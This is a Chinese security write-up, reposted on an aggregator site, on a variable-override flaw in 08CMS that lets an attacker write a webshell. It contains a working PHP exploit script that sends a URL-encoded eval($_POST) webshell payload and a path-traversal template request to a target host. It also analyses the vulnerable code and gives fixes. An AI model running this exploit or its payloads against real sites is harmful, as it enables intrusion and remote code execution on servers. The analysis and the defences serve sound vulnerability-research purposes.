码迷,mamicode.com
首页 > Web开发 > 详细

08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path

时间:2015-03-06 20:32:49      阅读:133      评论:0      收藏:0      [点我收藏+]

标签:

目录

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

简单描述这个漏洞

1. /include/general.inc.php
//本地变量注册
foreach(array(_POST,_GET) as $_request)
{
    foreach($$_request as $k => $v)
    {
        $k{0} != _ && $$k = maddslashes($v);
    }
}
/*
这里实现了模拟GPC功能,将用户输入的GET、POST数据中的变量注册到本地代码空间中,导致攻击者理论上可以向应用程序"注入"任意的变量值
*/

2. 通过本地变量覆盖,黑客可以控制目标应用程序将要进行的写文件操作,向网站目录下的任意位置写入任意文件


2. 漏洞触发条件

0x1: 攻击流

1. 上传一个包含WEBSHELL的非PHP文件
/*
/tools/ptool.php
..
$cf = M_ROOT.‘./dynamic/stats/aclicks.cac‘;
$ct = M_ROOT.‘./dynamic/stats/aclicks_time.cac‘;
..
if(@$fp = fopen($cf,‘a‘))
{
    fwrite($fp,"$aid");
    fclose($fp);
    ..
通过注入$aid,利用程序的本地变量覆盖漏洞,向/dynamic/stats/aclicks.cac写入WEBSHELL代码
$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
*/

2. 在第二个变量覆盖攻击点,传入这个文件路径(将要被打开的文件路径): 
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac

3. 程序打开/dynamic/stats/aclicks.cac,并重新写入到"/dynamic/stats/aclicks.cac.php"中,完成GETSHELL

0x2: POC

<?php
/* 
    exp:        index.php?tplname=../../dynamic/stats/aclicks.cac
    汽车CMS Shell:    /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
    装修CMS Shell    /dynamic/dynamic/stats/aclicks.cac.php 
*/
//$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp = /tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E;
//$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
$exp1 = /index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac;
 
if ($argc < 2 ) 
{
print_r(+---------------------------------------------------------------------------+
 [+] php .$argv[0]. [url]www.08sec.com[/url] 
+---------------------------------------------------------------------------+
);
    exit;
}
error_reporting(E_ERROR);
set_time_limit(0);
 
$host = $argv[1];
go($host);
 
function go ($host)
{
    global $exp,$exp1;

    $re = Send ($host,$exp);
    stripos($re, "MySQL") > 0 ? Send ($host, $exp) : ""
    $re = Send ($host, $exp1) && stripos($re, "aclicks.cac") > 0 ? exit(" + Exploit Success!rn + http://$host/template/dynamic/stats/aclicks.cac.phprn") : exit(" - Exploit Failed!n");
}
 
function Send($host,$url)
{
    $data = "GET $url  HTTP/1.1rn";
    $data .= "Host: $hostrn";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]rn";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
    $data .= "Content-Type: application/x-www-form-urlencodedrn";
    $data .= "Accept-Language: en-usrn";
    $data .= "Connection: Closernrn";
    $fp = @fsockopen($host, 80);
    if (!$fp) 
    {
        die("[-] Connect to host Errorrn");
    }
    fwrite($fp, $data);
    $back = ‘‘;
    while (!feof($fp)) 
    {
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}
?>

Relevant Link:

http://www.unhonker.com/bug/1390.html


3. 漏洞影响范围

08CMS全部商业版


4. 漏洞代码分析

本地变量注册实现代码

/include/general.inc.php

技术分享

/index.php

include_once dirname(__FILE__)./include/general.inc.php;
include_once M_ROOT../include/common.fun.php;

if_siteclosed();
mobile_open() || message(手机版尚未开放);
/*
function un_virtual($str)
{
    ......
    $str = str_replace(array(‘/‘,‘-‘),array(‘&‘,‘=‘),$str); 把 / 和 - 替换成 & 和 =
    ......
    return $str;
}
parse_str()把查询字符串解析到变量中,保存在变量$temparr中
*/
parse_str(un_virtual($_SERVER[QUERY_STRING]), $temparr);
... 

$_da = array();
if(!$cnstr)
{
    //$tplname这个在这里定义的了,相当于被初始化了
    $tplname = $_ismobile ? $o_index_tpl : $hometpl ; 
    $_da[rss] = $cms_abs.rss.php; 
    $_da += $temparr; // $_da= $_da+$temparr 
    unset($temparr);//销毁变量
 
    //变量覆盖,这样我们可以控制了$tplname这个变量,即对它重新覆盖
    extract($_da,EXTR_OVERWRITE); 
    //这个tpl_refresh函数就是漏洞利用的关键点
    tpl_refresh($tplname);   
    ...

/include/refresh.fun.php

function tpl_refresh($tplname)
{
    global $templatedir,$debugtag;
    $tdir = M_ROOT."template/$templatedir/"; 

    //$tplname可以由攻击者控制,所以$cacf也等同于被攻击者控制
    $cacf = $tdir.pcache/. $tplname..php;              
    if(file_exists($x = $tdir."function/utags.fun.php")) 
    {
    include_once $x;
    } 
    mmkdir($cacf,0,1);
    if($debugtag || !file_exists($cacf))
    {
    //打开文件,返回内容
    $str = load_tpl($tplname);   
    $tpl = @file2str(M_ROOT."template/$templatedir/".$tplname);  //file2str这个是打开文件的函数  
    $rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval(‘\1‘,‘$rt‘)",$tpl); 过滤 
 
        $str = preg_replace("/<\?(?!php\s|=|\s)/i", <?=<??>, $str); 
        $str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);
        breplace($str,‘‘);
        nreplace($str);
        quit_refresh_var();
                
        $str = tpl_basecode($str);
        
    /*
    漏洞的关键,在这里
    1. $str: 攻击者可控制,这是一个.cac文件的内容,攻击者可以通过另一个变量覆盖向服务器写入一个.cac的WEBSHELL
    2. $cacf: 攻击者可控制,攻击者传入的参数是一个非PHP文件路径(.cac文件),这个文件也是真实存在的,可以通过另一个变量注入上传一个.cac文件,同时,程序在末尾拼接了".php",使其成为写一个PHP文件
    
    从结果上来看,相当于进行了一次.cac到.php的后缀重命名处理
    */
        str2file($str, $cacf);
    }
    unset($str,$tdir,$cacf);
}


5. 防御方法

/index.php

if(!$cnstr)
{
    //$tplname这个在这里定义的了,相当于被初始化了
    $tplname = $_ismobile ? $o_index_tpl : $hometpl ; 
    $_da[rss] = $cms_abs.rss.php; 
    $_da += $temparr; // $_da= $_da+$temparr 
    unset($temparr);//销毁变量

    /*
    如果对应变量已经存在,则不进行覆盖操作
    */
    extract($_da, EXTR_SKIP);  
    tpl_refresh($tplname);   
    ...


6. 攻防思考

防御变量覆盖的防御思路

1. 重新运行一次原始的代码逻辑,将被覆盖的变量再赋值回原始的值
2. 在本地变量注册的入口处对关键字进行检测

 

Copyright (c) 2014 LittleHann All rights reserved

 

08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path

标签:

原文地址:http://www.cnblogs.com/LittleHann/p/4319095.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!